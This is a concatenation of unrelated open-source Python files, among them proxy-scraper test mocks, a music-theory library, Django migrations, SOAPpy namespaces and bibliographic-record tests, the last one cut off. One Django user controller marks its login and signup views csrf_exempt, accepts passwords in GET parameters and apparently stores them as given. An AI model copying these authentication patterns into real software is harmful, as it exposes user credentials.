<tfoot>
<tr>
<th class="input"><input type="text" /></th>
<th></th><th></th>
<th class='hm'></th>
<th></th>
<th class='hm'></th>
<th class='hx'></th>
<th class='hm'></th>
</tr>
</tfoot>
</table>
"""
@urlmatch(netloc=r'(.*\.)?free-proxy-list\.net$')
def free_proxy_mock(url, request):
return """<table border="0" cellpadding="0" cellspacing="0" id="proxylisttable"
id="proxylisttable">\n
<thead>\n
<tr>\n
<th>IP Address</th>
\n
<th>Port</th>
\n
<th>Code</th>
\n
<th>Country</th>
\n
<th>Anonymity</th>
\n
<th>Google</th>
\n
<th>Https</th>
\n
<th>Last Checked</th>
\n
</tr>
\n
</thead>
\n
<tbody>
<tr>
<td>138.197.136.46</td>
<td>3128</td>
<td>CA</td>
<td>Canada</td>
<td>anonymous</td>
<td>no</td>
<td>no</td>
<td>7 seconds ago</td>
</tr>
\n
<tr>
<td>177.207.75.227</td>
<td>8080</td>
<td>BR</td>
<td>Brazil</td>
<td>transparent</td>
<td>no</td>
<td>no</td>
<td>2 hours 21 minutes ago</td>
</tr>
\n
</tbody>
\n
<tfoot>\n
<tr>\n
<th class="input"><input type="text"/></th>
\n
<th></th>
\n
<th></th>
\n
<th></th>
\n
<th></th>
\n
<th></th>
\n
<th></th>
\n
<th></th>
\n
</tr>
\n
</tfoot>
\n
</table>"""
@urlmatch(netloc=r'(.*\.)?proxyfor\.eu')
def proxy_for_eu_mock(url, request):
return """<table class="proxy_list">
<tr>
<th>IP</th>
<th>Port</th>
<th>Country</th>
<th>Anon</th>
<th>Speed</th>
<th> Check</th>
<th>Cookie/POST</th>
</tr>
<tr>
<td>107.151.136.222</td>
<td>80</td>
<td>United States</td>
<td>HIGH</td>
<td>1.643</td>
<td>2016-04-12 17:02:43</td>
<td>Yes/Yes</td>
</tr>
<tr>
<td>37.187.253.39</td>
<td>8115</td>
<td>France</td>
<td>HIGH</td>
<td>12.779</td>
<td>2016-04-12 14:36:18</td>
<td>Yes/Yes</td>
</tr>
</table>"""
@urlmatch(netloc=r'(.*\.)?rebro\.weebly\.com$')
def rebro_weebly_mock(url, request):
return """<div class="paragraph" style="text-align:left;"><strong><font color="#3ab890" size="3"><font
color="#d5d5d5">IP:Port</font></font></strong><br/><font
size="2"><strong><font color="#33a27f">213.149.105.12:8080<br/>119.188.46.42:8080</font></strong></font><br/><span></span>
</div>
<div class="paragraph" style="text-align:left;"><font size="2"><strong><font size="3"><font color="#3ab890">Country</font></font></strong></font><font size="2">
<br />Montenegro<br />China<br /></font><br /><span></span>
</div>
<div class="paragraph" style="text-align:left;"><font size="2"><strong><font color="#3ab890" size="3">Status</font></strong></font><br /><font size="2">
Elite & Anonymous<br />Elite & Anonymous<br /></font><br /><span></span>
</div>
"""
@urlmatch(netloc=r'(.*\.)?www\.premproxy\.com')
def prem_mock(url, request):
return """
<head>
<script src="/js/test.js"></script>
</head>
<div id="proxylist">\n
<tr class="anon">\n
<th><a href="/list/ip-address-01.htm" title="Proxy List sorted by ip address">IP address</a></th>
\n
<th><a href="/list/" title="Proxy List sorted by anonymity level">Anonymity</a></th>
\n
<th><a href="/list/time-01.htm" title="Proxy List sorted by updated time">Checked</a></th>
\n
<th><a href="/list/type-01.htm" title="Proxy list sorted by country">Country</a></th>
\n
<th><dfn title="City or State\\Region ">City</dfn></th>
\n
<th><dfn title="Internet Service Provider">ISP</dfn></th>
\n
</tr>
\n
<div id="navbar">
<ul class="pagination"><li class="active"><a href="/list/">1</a></li><li><a href="02.htm">2</a></li></ul>
</div>
\n
<tr class="anon">
<td data-label="IP:port "><span><input type="checkbox" name="proxyIp[]" value="191.252.61.28|r60e6"></span>191.252.61.28:<span class="r60e6"></span></td>
<td data-label="Anonymity Type: ">high-anonymous</td>
<td data-label="Checked: ">Apr-18, 17:18</td>
<td data-label="Country: ">Brazil</td>
<td data-label="City: ">S\xe3o Jos\xe9 Dos Campos</td>
<td data-label="ISP: "><dfn title="Locaweb Servi\xe7os de Internet S/A">Locaweb
Servi\xe7o...</dfn></td>
</tr>
\n
<tr class="anon">
<td data-label="IP:port "><span><input type="checkbox" name="proxyIp[]" value="167.114.203.141|r63c5"></span>167.114.203.141:<span class="r63c5"></span></td>
<td data-label="Anonymity Type: ">transparent</td>
<td data-label="Checked: ">Apr-18, 13:22</td>
<td data-label="Country: ">Canada</td>
<td data-label="City: ">Montr\xe9al (QC)</td>
<td data-label="ISP: ">OVH Hosting</td>
</tr>
\n
<tr class="anon">
<td data-label="IP:port "><span><input type="checkbox" name="proxyIp[]" value="152.251.141.93|r63c5"></span>152.251.141.93:<span class="r63c5"></span></td>
<td data-label="Anonymity Type: ">elite </td>
<td data-label="Checked: ">Jul-16, 04:39</td>
<td data-label="Country: ">Brazil</td>
<td data-label="City: "> </td>
<td data-label="ISP: ">Vivo</td>
</tr>
\n
<tr><td colspan="6"><span><input type="checkbox" name="" value="" onclick="checkAll(this)"></span>Select All Proxies</td></tr>
</div>"""
@urlmatch(netloc=r'(.*\.)?www\.premproxy\.com', path='/js/test.js', method='get', scheme='https')
def prem_js_mock(url, request):
return b"eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};" \
b"if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\\\w+'};c=1};" \
b"while(c--){if(k[c]){p=p.replace(new RegExp('\\\\b'+e(c)+'\\\\b','g'),k[c])}}return p}('$(t).u(v(){$(\\'.s\\').0(r);" \
b"$(\\'.n\\').0(o);$(\\'.p\\').0(q);$(\\'.w\\').0(x);$(\\'.D\\').0(E);$(\\'.F\\').0(C);$(\\'.B\\').0(y);$(\\'.z\\').0(A);" \
b"$(\\'.m\\').0(i);$(\\'.7\\').0(8);$(\\'.9\\').0(6);$(\\'.4\\').0(1);$(\\'.2\\').0(5);$(\\'.3\\').0(a);$(\\'.l\\').0(b);" \
b"$(\\'.j\\').0(k);$(\\'.h\\').0(g);$(\\'.c\\').0(d);$(\\'.e\\').0(f);$(\\'.G\\').0(1n);$(\\'.H\\').0(1b);$(\\'.1c\\').0(19);" \
b"$(\\'.18\\').0(14);$(\\'.15\\').0(16);$(\\'.17\\').0(1d);$(\\'.1e\\').0(1k);$(\\'.1l\\').0(1m);$(\\'.1j\\').0(1i);$(\\'.1f\\').0(1g);" \
b"$(\\'.1h\\').0(13);$(\\'.12\\').0(O);$(\\'.P\\').0(Q);$(\\'.N\\').0(M);$(\\'.I\\').0(J);$(\\'.K\\').0(L);$(\\'.R\\').0(S);$(\\'.Z\\').0(10)" \
b";$(\\'.11\\').0(Y);$(\\'.X\\').0(T);$(\\'.U\\').0(V);$(\\'.W\\').0(1a)});',62,86,'html|20183|r97e1|rff0a|r117f|65103|65205|r76d3|52335|r21e1|" \
b"62225|9000|r2e7b|81|r0d8a|9797|6666|r1f9b|28080|rdde2|31773|rf51a|rd687|r1c53|53281|raceb|3128|8080|r63c5|document|ready|function|r60e6|80|8888|" \
b"r6ec1|8181|rb058|8197|r40ed|8081|re3f0|r28a8|r55d0|ra6df|8090|r4381|8000|53282|r125a|8082|r2f55|2016|r6714|47753|55012|rb59a|9090|ra346|r4b77|54214|" \
b"rd762|1080|rc6d0|r9946|60088|9999|r3e10|8118|r7f82|r371f|54314|63909|41258|r8065|8380|rf914|r9e8e|8088|r3c82|808|r3165|8383|r6643|555|3130'.split('|'),0,{}))\n"
|
pgaref/HTTP_Request_Randomizer
|
tests/mocks.py
|
Python
|
mit
| 9,201
|
class Popup(object):
def __init__(self, message, icon=None, colour=None, lifespan=2):
self._message = message
self._icon = icon
self._colour = colour
self._lifespan = lifespan
@property
def message(self):
return self._message
@property
def icon(self):
return self._icon
@property
def colour(self):
return self._colour
@property
def lifespan(self):
return self._lifespan
def update(self, dt):
if self._lifespan > 0:
self._lifespan -= dt
if self._lifespan < 0:
self._lifespan = 0
@property
def is_alive(self):
return self._lifespan > 0
def __eq__(self, other):
return self.message == other.message
|
kfcpaladin/sze-the-game
|
game/models/popups/Popup.py
|
Python
|
mit
| 803
|
../../../../share/pyshared/orca/script_utilities.py
|
Alberto-Beralix/Beralix
|
i386-squashfs-root/usr/lib/python2.7/dist-packages/orca/script_utilities.py
|
Python
|
gpl-3.0
| 51
|
"""
A simple numeric library for music computation.
This module is good for teaching, demonstrations, and quick hacks. To
generate actual music you should use the music module.
"""
from itertools import combinations, chain
from fractions import Fraction
def mod12(n):
return n % 12
def interval(x, y):
return mod12(x - y)
def interval_class(x, y):
return min(interval(x, y), interval(y, x))
def intervals(notes):
return [interval_class(y, x) for x, y in zip(notes, rotate(notes)[:-1])]
def all_intervals(notes):
intervals_list = [intervals(n) for n in combinations(sorted(notes), 2)]
return sorted(chain.from_iterable(intervals_list))
def transposition(notes, index):
return [mod12(n + index) for n in notes]
def transposition_startswith(notes, start):
return transposition(notes, start - notes[0])
def is_related_by_transposition(notes1, notes2):
rotations = rotate_set(sorted(notes2))
transpositions = [transposition(sorted(notes1), n) for n in range(0, 12)]
return any(True for rotation in rotations if rotation in transpositions)
def inversion(notes, index=0):
return [mod12(index - n) for n in notes]
def inversion_startswith(notes, start):
transp = transposition_startswith(notes, 0)
return transposition_startswith(inversion(transp), start)
def inversion_first_note(notes):
return inversion(notes, 2 * notes[0])
def rotate(notes, n=1):
modn = n % len(notes)
return notes[modn:] + notes[0:modn]
def rotate_set(notes):
return [rotate(notes, x) for x in range(0, len(notes))]
def retrograde(notes):
return list(reversed(notes))
def note_name(number):
notes = "C C# D D# E F F# G G# A A# B".split()
return notes[mod12(number)]
def notes_names(notes):
return [note_name(x) for x in notes]
def accidentals(note_string):
acc = len(note_string[1:])
if "#" in note_string:
return acc
elif "b" in note_string:
return -acc
else:
return 0
def name_to_number(note_string):
notes = "C . D . E F . G . A . B".split()
name = note_string[0:1].upper()
number = notes.index(name)
acc = accidentals(note_string)
return mod12(number + acc)
def name_to_diatonic(note_string):
notes = "C D E F G A B".split()
name = note_string[0:1].upper()
return notes.index(name)
def note_duration(note_value, unity, tempo):
return (60.0 * note_value) / (tempo * unity)
def dotted_duration(duration, dots):
ratio = Fraction(1, 2)
return duration * (1 - ratio ** (dots + 1)) / ratio
def durations(notes_values, unity, tempo):
return [note_duration(nv, unity, tempo) for nv in notes_values]
def get_quality(diatonic_interval, chromatic_interval):
if diatonic_interval in [0, 3, 4]:
quality_map = ["Diminished", "Perfect", "Augmented"]
else:
quality_map = ['Diminished', 'Minor', 'Major', 'Augmented']
index_map = [-1, 0, 2, 4, 6, 7, 9]
try:
return quality_map[chromatic_interval - index_map[diatonic_interval]]
except IndexError as no_interval:
raise Exception("Sorry, I can't deal with this interval") from no_interval
def interval_name(note1, note2):
quantities = ["Unison", "Second", "Third", "Fourth", "Fifth", "Sixth", "Seventh"]
n1, n2 = name_to_number(note1), name_to_number(note2)
d1, d2 = name_to_diatonic(note1), name_to_diatonic(note2)
chromatic_interval = interval(n2, n1)
diatonic_interval = (d2 - d1) % 7
quantity_name = quantities[diatonic_interval]
quality_name = get_quality(diatonic_interval, chromatic_interval)
return "%s %s" % (quality_name, quantity_name)
|
kroger/pyknon
|
pyknon/simplemusic.py
|
Python
|
mit
| 3,658
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2015-12-30 06:34
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('core', '0007_auto_20151229_1804'),
]
operations = [
migrations.CreateModel(
name='Answer',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('value', models.TextField()),
('problem', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='core.Problem')),
],
),
migrations.AddField(
model_name='user',
name='problems',
field=models.ManyToManyField(through='core.ProblemMapping', to='core.Problem'),
),
migrations.AddField(
model_name='answer',
name='user',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
]
|
patrickspencer/compass-python
|
webapp/apps/core/migrations/0008_auto_20151230_0634.py
|
Python
|
apache-2.0
| 1,139
|
from kwue.DB_functions.tag_db_functions import *
from django.views.decorators.csrf import csrf_exempt
from django.views.decorators.csrf import requires_csrf_token
from kwue.controllers.home import *
def get_user(req):
user_id = req.GET.dict()['user_id']
user = db_retrieve_user(user_id)
user_dict = ingredient_from_object_to_list(user)
del user_dict['_state'] # alptekin fix FacePalm
tag_list = return_tags(user_id, "User")
user_dict['tag_list'] = tag_list
user_dict['foods'] = db_get_user_foods(user_id)
return HttpResponse(json.dumps(user_dict), content_type='application/json')
def get_user_profile_page(req):
if req.session['user_id'] != -2:
user_id = req.session['user_id']
else:
user_id = req.GET.dict()['user_id']
user = db_retrieve_user(user_id)
user_dict = ingredient_from_object_to_list(user)
del user_dict['_state'] # alptekin fix FacePalm
tag_list = return_tags(user_id, "User")
user_dict['tag_list'] = tag_list
return render(req, 'kwue/user_profile_page.html', user_dict)
def update_diet_page(req):
user_name = db_retrieve_user(req.session['user_id']).user_name
return render(req, 'kwue/update_diet.html', {'user_name': user_name})
def get_eating_preferences(req):
user_id = 0
if req.session.has_key('user_id'):
user_id = req.session['user_id']
else:
user_id = req.GET.dict()['user_id']
ep = db_retrieve_eating_preferences(user_id)
return HttpResponse(json.dumps(ep), content_type='application/json')
@csrf_exempt
def update_eating_preferences(req):
user_id = 0
if req.session.has_key('user_id'):
user_id = req.session['user_id']
else:
user_id = req.POST.dict()['user_id']
ep = req.POST.dict()
db_update_user_preferences(user_id, ep)
user = db_retrieve_user(user_id)
user.unwanted_ingredients.clear()
user.wanted_ingredients.clear()
db_insert_user_unwanted_ing(user_id, json.loads(ep['unwanted_list']))
db_insert_user_wanted_ing(user_id, json.loads(ep['wanted_list']))
return HttpResponse(json.dumps({'is_success': True}), content_type='application/json')
@csrf_exempt
def sign_up(req):
#DB ye user kaydedilsin
new_user_dict = req.POST.dict()
#Check that the email adress has not been used before !!!!!!!!!!
user_email_address = new_user_dict['user_email_address']
user_information_dict = dict(
user_name=new_user_dict["user_name"],
user_nick=new_user_dict["user_nick"],
user_email_address=new_user_dict["user_email_address"],
user_password=new_user_dict["user_password"],
user_image=new_user_dict["user_image"],
user_type=new_user_dict["user_type"]
)
db_insert_user(user_information_dict)
return render(req, 'kwue/login.html', {'user_name': 'Guest'})
def signup_page(req):
return render(req, 'kwue/signup.html', {'user_name': 'Guest'})
@csrf_exempt
def login(req):
# DB den user ın var olup olmadığına dair bilgi gelsin
# DB bana userın id sini versin ve o id ile session başlasın
user_dict = req.POST.dict()
user_email_address = user_dict['user_email_address']
user_password = user_dict["user_password"]
user = db_validate_user(user_email_address, user_password)
if user:
print("User"+user_email_address+ "exists")
req.session['user_id']= user.user_id
user_type = user.user_type
user_id = user.user_id
user_name = user.user_name
user_image = user.user_image
if user_type is False:
return render(req, 'kwue/home.html', {'recommendations': suggest(user_id), 'user_type': 0, 'user_name': user_name, 'user_id': user_id})
else:
return render(req, 'kwue/home.html', {'analysis_report': analyze(user_id), 'user_type': 1, 'user_name': user_name, 'user_image': user_image})
else:
print("User does not exists.")
return render(req, 'kwue/login.html', {'user_name': 'Guest'})
def get_login(req):
return render(req, 'kwue/login.html', {'user_name': 'Guest'})
def logout(req):
foods = db_retrieve_all_foods()
req.session['user_id'] = -2
return render(req, 'kwue/home.html', {'recommendations': foods, 'user_type': 0, 'user_name': 'Guest'})
@csrf_exempt
@requires_csrf_token
def android_login(req):
user_dict = req.GET.dict()
user_email_address = user_dict['user_email_address']
user_password = user_dict["user_password"]
user = db_validate_user(user_email_address, user_password)
if user:
req.session['user_id'] = user.user_id
return HttpResponse(json.dumps({'user_id': user.user_id}), content_type='application/json')
else:
req.session['user_id'] = -2
return HttpResponse(json.dumps({'user_id': -2}), content_type='application/json')
@csrf_exempt
@requires_csrf_token
def android_logout(req):
req.session['user_id'] = -2
return HttpResponse(json.dumps({'is_success': True}), content_type='application/json')
|
bounswe/bounswe2016group4
|
kwueBackend/kwue/controllers/user.py
|
Python
|
apache-2.0
| 5,045
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('predict', '0010_predictdataset_delete_sources'),
]
operations = [
migrations.RemoveField(
model_name='predictdataset',
name='status',
),
]
|
IQSS/gentb-site
|
apps/predict/migrations/0011_remove_predictdataset_status.py
|
Python
|
agpl-3.0
| 371
|
"""
################################################################################
#
# SOAPpy - Cayce Ullman (cayce@actzero.com)
# Brian Matthews (blm@actzero.com)
# Gregory Warnes (gregory_r_warnes@groton.pfizer.com)
# Christopher Blunck (blunck@gst.com)
#
################################################################################
# Copyright (c) 2003, Pfizer
# Copyright (c) 2001, Cayce Ullman.
# Copyright (c) 2001, Brian Matthews.
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# Neither the name of actzero, inc. nor the names of its contributors may
# be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
################################################################################
"""
from __future__ import nested_scopes
ident = '$Id: NS.py,v 1.3 2004/01/31 04:20:05 warnes Exp $'
from version import __version__
##############################################################################
# Namespace Class
################################################################################
def invertDict(dict):
d = {}
for k, v in dict.items():
d[v] = k
return d
class NS:
XML = "http://www.w3.org/XML/1998/namespace"
ENV = "http://schemas.xmlsoap.org/soap/envelope/"
ENC = "http://schemas.xmlsoap.org/soap/encoding/"
XSD = "http://www.w3.org/1999/XMLSchema"
XSD2 = "http://www.w3.org/2000/10/XMLSchema"
XSD3 = "http://www.w3.org/2001/XMLSchema"
XSD_L = [XSD, XSD2, XSD3]
EXSD_L= [ENC, XSD, XSD2, XSD3]
XSI = "http://www.w3.org/1999/XMLSchema-instance"
XSI2 = "http://www.w3.org/2000/10/XMLSchema-instance"
XSI3 = "http://www.w3.org/2001/XMLSchema-instance"
XSI_L = [XSI, XSI2, XSI3]
URN = "http://soapinterop.org/xsd"
# For generated messages
XML_T = "xml"
ENV_T = "SOAP-ENV"
ENC_T = "SOAP-ENC"
XSD_T = "xsd"
XSD2_T= "xsd2"
XSD3_T= "xsd3"
XSI_T = "xsi"
XSI2_T= "xsi2"
XSI3_T= "xsi3"
URN_T = "urn"
NSMAP = {ENV_T: ENV, ENC_T: ENC, XSD_T: XSD, XSD2_T: XSD2,
XSD3_T: XSD3, XSI_T: XSI, XSI2_T: XSI2, XSI3_T: XSI3,
URN_T: URN}
NSMAP_R = invertDict(NSMAP)
STMAP = {'1999': (XSD_T, XSI_T), '2000': (XSD2_T, XSI2_T),
'2001': (XSD3_T, XSI3_T)}
STMAP_R = invertDict(STMAP)
def __init__(self):
raise Error, "Don't instantiate this"
|
intip/da-apps
|
plugins/da_centrallogin/modules/soappy/SOAPpy/NS.py
|
Python
|
gpl-2.0
| 3,735
|
# -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2010, 2011 CERN.
#
# Invenio is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Invenio is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Invenio; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""
The Refextract task tests suite for tasks
It requires a fully functional invenio installation.
"""
from invenio.testutils import InvenioTestCase
from invenio.testutils import make_test_suite, run_test_suite
from invenio.refextract_api import update_references, \
RecordHasReferences, \
FullTextNotAvailable
class RefextractApiTest(InvenioTestCase):
def test_no_fulltext(self):
try:
update_references(2000000)
self.fail()
except FullTextNotAvailable:
# As expected
pass
def test_no_overwrite(self):
try:
update_references(92, overwrite=False)
self.fail()
except RecordHasReferences:
# As expected
pass
TEST_SUITE = make_test_suite(RefextractApiTest)
if __name__ == '__main__':
run_test_suite(TEST_SUITE)
|
CERNDocumentServer/invenio
|
modules/docextract/lib/refextract_api_regression_tests.py
|
Python
|
gpl-2.0
| 1,703
|
"""Setup data-structures module."""
from setuptools import setup
setup(
name="sorting-algorithms",
description="Python implementations of classic sorting algorithms",
version=0.2,
author=["Ford Fowler", "Claire Gatenby"],
author_email=["fordjfowler@gmail.com", "clairejgatenby@gmail.com"],
licencse="MIT",
package_dir={'': 'src'},
py_modules=["insertion_sort", 'quick_sort', 'merge_sort'],
extras_require={
"test": ["pytest", "pytest-cov", "tox", 'coveralls']
}
)
|
fordf/sorting-algorithms
|
setup.py
|
Python
|
mit
| 515
|
# -*- coding: utf-8 -*-
#
# This file is part of INSPIRE.
# Copyright (C) 2014-2017 CERN.
#
# INSPIRE is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# INSPIRE is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with INSPIRE. If not, see <http://www.gnu.org/licenses/>.
#
# In applying this license, CERN does not waive the privileges and immunities
# granted to it by virtue of its status as an Intergovernmental Organization
# or submit itself to any jurisdiction.
from __future__ import absolute_import, division, print_function
from dojson.contrib.marc21.utils import create_record
from inspire_dojson.jobs import jobs
from inspire_schemas.api import load_schema, validate
def test_deadline_date_from_046__i():
schema = load_schema('jobs')
subschema = schema['properties']['deadline_date']
snippet = (
'<datafield tag="046" ind1=" " ind2=" ">'
' <subfield code="i">2015-12-15</subfield>'
'</datafield>'
) # record/1310294
expected = '2015-12-15'
result = jobs.do(create_record(snippet))
assert validate(result['deadline_date'], subschema) is None
assert expected == result['deadline_date']
def test_deadline_date_from_046__i__fake_date():
snippet = (
'<datafield tag="046" ind1=" " ind2=" ">'
' <subfield code="i">0000</subfield>'
'</datafield>'
) # record/959114
result = jobs.do(create_record(snippet))
assert 'deadline_date' not in result
def test_deadline_date_from_046__i__wrong_date():
schema = load_schema('jobs')
subschema = schema['properties']['deadline_date']
snippet = (
'<datafield tag="046" ind1=" " ind2=" ">'
' <subfield code="i">2014-06-31</subfield>'
'</datafield>'
) # record/1279445
expected = '2014-06'
result = jobs.do(create_record(snippet))
assert validate(result['deadline_date'], subschema) is None
assert expected == result['deadline_date']
def test_closed_date_from_046__l():
schema = load_schema('jobs')
subschema = schema['properties']['closed_date']
snippet = (
'<datafield tag="046" ind1=" " ind2=" ">'
' <subfield code="l">2008-02-11</subfield>'
'</datafield>'
) # record/934304
expected = '2008-02-11'
result = jobs.do(create_record(snippet))
assert validate(result['closed_date'], subschema) is None
assert expected == result['closed_date']
def test_closed_date_from_046__l_fake_date():
snippet = (
'<datafield tag="046" ind1=" " ind2=" ">'
' <subfield code="l">0000</subfield>'
'</datafield>'
) # record/958863
result = jobs.do(create_record(snippet))
assert 'closed_date' not in result
def test_date_closed_from_046__i_and_046__l_an_url():
schema = load_schema('jobs')
subschema_deadline_date = schema['properties']['deadline_date']
subschema_urls = schema['properties']['urls']
snippet = (
'<record>'
' <datafield tag="046" ind1=" " ind2=" ">'
' <subfield code="i">2012-06-01</subfield>'
' </datafield>'
' <datafield tag="046" ind1=" " ind2=" ">'
' <subfield code="l">http://www.pma.caltech.edu/physics-search</subfield>'
' </datafield>'
'</record>'
) # record/963314
expected_deadline_date = '2012-06-01'
expected_urls = [
{'value': 'http://www.pma.caltech.edu/physics-search'},
]
result = jobs.do(create_record(snippet))
assert validate(result['deadline_date'], subschema_deadline_date) is None
assert expected_deadline_date == result['deadline_date']
assert validate(result['urls'], subschema_urls) is None
assert expected_urls == result['urls']
def test_date_closed_from_046__i_and_046__l_an_email():
schema = load_schema('jobs')
subschema_deadline_date = schema['properties']['deadline_date']
subschema_reference_email = schema['properties']['reference_email']
snippet = (
'<record>'
' <datafield tag="046" ind1=" " ind2=" ">'
' <subfield code="l">yejb@smu.edu</subfield>'
' </datafield>'
' <datafield tag="046" ind1=" " ind2=" ">'
' <subfield code="i">8888</subfield>'
' </datafield>'
'</record>'
) # record/1089529
expected_deadline_date = '8888'
expected_reference_email = ['yejb@smu.edu']
result = jobs.do(create_record(snippet))
assert validate(result['deadline_date'], subschema_deadline_date) is None
assert expected_deadline_date == result['deadline_date']
assert validate(result['reference_email'], subschema_reference_email) is None
assert expected_reference_email == result['reference_email']
def test_contact_details_from_marcxml_270_single_p_single_m():
schema = load_schema('jobs')
subschema = schema['properties']['contact_details']
snippet = (
'<datafield tag="270" ind1=" " ind2=" ">'
' <subfield code="m">lindner@mpi-hd.mpg.de</subfield>'
' <subfield code="p">Manfred Lindner</subfield>'
'</datafield>'
)
expected = [
{
'name': 'Manfred Lindner',
'email': 'lindner@mpi-hd.mpg.de',
},
]
result = jobs.do(create_record(snippet))
assert validate(result['contact_details'], subschema) is None
assert expected == result['contact_details']
def test_contact_details_from_marcxml_270_double_p_single_m():
schema = load_schema('jobs')
subschema = schema['properties']['contact_details']
snippet = (
'<datafield tag="270" ind1=" " ind2=" ">'
' <subfield code="m">lindner@mpi-hd.mpg.de</subfield>'
' <subfield code="p">Manfred Lindner</subfield>'
' <subfield code="p">Boogeyman</subfield>'
'</datafield>'
)
expected = [
{'email': 'lindner@mpi-hd.mpg.de'},
]
result = jobs.do(create_record(snippet))
assert validate(result['contact_details'], subschema) is None
assert expected == result['contact_details']
def test_contact_details_from_marcxml_270_single_p_double_m():
schema = load_schema('jobs')
subschema = schema['properties']['contact_details']
snippet = (
'<datafield tag="270" ind1=" " ind2=" ">'
' <subfield code="m">lindner@mpi-hd.mpg.de</subfield>'
' <subfield code="m">lindner@ecmrecords.com</subfield>'
' <subfield code="p">Manfred Lindner</subfield>'
'</datafield>'
)
expected = [
{'name': 'Manfred Lindner'},
]
result = jobs.do(create_record(snippet))
assert validate(result['contact_details'], subschema) is None
assert expected == result['contact_details']
def test_contact_details_from_multiple_marcxml_270():
schema = load_schema('jobs')
subschema = schema['properties']['contact_details']
snippet = (
'<record> '
' <datafield tag="270" ind1=" " ind2=" ">'
' <subfield code="m">lindner@mpi-hd.mpg.de</subfield>'
' <subfield code="p">Manfred Lindner</subfield>'
' </datafield>'
' <datafield tag="270" ind1=" " ind2=" ">'
' <subfield code="p">Wynton Marsalis</subfield>'
' </datafield>'
'</record>'
)
expected = [
{
'name': 'Manfred Lindner',
'email': 'lindner@mpi-hd.mpg.de',
},
{
'name': 'Wynton Marsalis',
},
]
result = jobs.do(create_record(snippet))
assert validate(result['contact_details'], subschema) is None
assert expected == result['contact_details']
def test_regions_from_043__a():
schema = load_schema('jobs')
subschema = schema['properties']['regions']
snippet = (
'<datafield tag="043" ind1=" " ind2=" ">'
' <subfield code="a">Asia</subfield>'
'</datafield>'
)
expected = ['Asia']
result = jobs.do(create_record(snippet))
assert validate(result['regions'], subschema) is None
assert expected == result['regions']
def test_regions_from_043__a_corrects_misspellings():
schema = load_schema('jobs')
subschema = schema['properties']['regions']
snippet = (
'<datafield tag="043" ind1=" " ind2=" ">'
' <subfield code="a">United States</subfield>'
'</datafield>'
)
expected = ['North America']
result = jobs.do(create_record(snippet))
assert validate(result['regions'], subschema) is None
assert expected == result['regions']
def test_regions_from_043__a_splits_on_commas():
schema = load_schema('jobs')
subschema = schema['properties']['regions']
snippet = (
'<datafield tag="043" ind1=" " ind2=" ">'
' <subfield code="a">Asia, North America</subfield>'
'</datafield>'
)
expected = ['Asia', 'North America']
result = jobs.do(create_record(snippet))
assert validate(result['regions'], subschema) is None
assert expected == result['regions']
def test_experiments_from_693__e():
schema = load_schema('jobs')
subschema = schema['properties']['experiments']
snippet = (
'<datafield tag="693" ind1=" " ind2=" ">'
' <subfield code="e">ALIGO</subfield>'
'</datafield>'
) # record/1375852
expected = [
{
'curated_relation': False,
'name': 'ALIGO',
},
]
result = jobs.do(create_record(snippet))
assert validate(result['experiments'], subschema) is None
assert expected == result['experiments']
def test_experiments_from_693__e__0():
schema = load_schema('jobs')
subschema = schema['properties']['experiments']
snippet = (
'<datafield tag="693" ind1=" " ind2=" ">'
' <subfield code="e">CERN-LHC-ATLAS</subfield>'
' <subfield code="0">1108541</subfield>'
'</datafield>'
) # record/1332138
expected = [
{
'curated_relation': True,
'name': 'CERN-LHC-ATLAS',
'record': {
